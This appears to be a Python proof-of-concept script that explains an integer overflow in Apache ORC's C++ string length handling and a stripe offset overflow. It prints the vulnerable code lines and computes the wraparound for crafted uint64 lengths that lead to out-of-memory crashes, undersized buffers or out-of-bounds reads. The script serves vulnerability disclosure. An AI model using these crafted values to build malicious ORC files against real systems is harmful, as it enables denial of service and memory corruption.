poc-orc-string-length-overflow / poc_orc_string_overflow.py
0xiviel's picture
Upload poc_orc_string_overflow.py with huggingface_hub
ecf1516 verified
#!/usr/bin/env python3
"""
PoC: Apache ORC String Length Integer Overflow
===============================================
Root cause: ColumnReader.cc:697
totalLength += static_cast<size_t>(lengths[i]);
// lengths[i] is int64_t from unsigned RLE decoder — NO negative check
String lengths decoded by unsigned RLE (isSigned=false, line 645)
are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
on negative int64_t produces huge size_t → OOM or wrap-to-zero.
"""
import struct
def show_overflow():
print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
print("=" * 60)
print()
print("Vulnerable code (ColumnReader.cc:691-706):")
print(" size_t totalLength = 0;")
print(" for (i = 0; i < numValues; ++i)")
print(" totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!")
print()
print("How negative lengths occur:")
print(" 1. RLE decoder is unsigned (isSigned=false, line 645)")
print(" 2. Output stored in int64_t* (line 715-718)")
print(" 3. uint64 values >= 2^63 become negative int64_t")
print(" 4. static_cast<size_t>(negative) = huge positive")
print()
test_cases = [
("OOM DoS: single huge length", [2**63]),
("Wrap to 0: two lengths", [2**64 - 1, 1]),
("Wrap to 1: crafted pair", [2**64 - 100, 101]),
]
for desc, uint_lengths in test_cases:
print(f"Case: {desc}")
total = 0
for ul in uint_lengths:
as_int64 = struct.unpack('q', struct.pack('Q', ul % (2**64)))[0]
as_size_t = ul % (2**64)
total = (total + as_size_t) % (2**64)
print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
print(f" totalLength = {total} ({total:#018x})")
if total == 0:
print(" -> blob.resize(0) -> EMPTY BLOB")
print(" -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
elif total < 1000:
print(f" -> blob.resize({total}) -> UNDERSIZED BUFFER")
print(" -> actual data > blob size -> HEAP CORRUPTION")
elif total > 2**40:
print(f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH")
print()
print("Additional: Stripe offset overflow (Reader.cc:591)")
print(" stripeFooterStart = offset + index_length + data_length")
print(" All uint64 from protobuf, no overflow check")
print(" -> wraps around -> reads wrong file location")
print()
print("ORC C++ has ZERO safe arithmetic in core parsing code")
print(" Reader.cc: 0 overflow checks in 1830 lines")
print(" ColumnReader.cc: 0 overflow checks in 1793 lines")
if __name__ == "__main__":
show_overflow()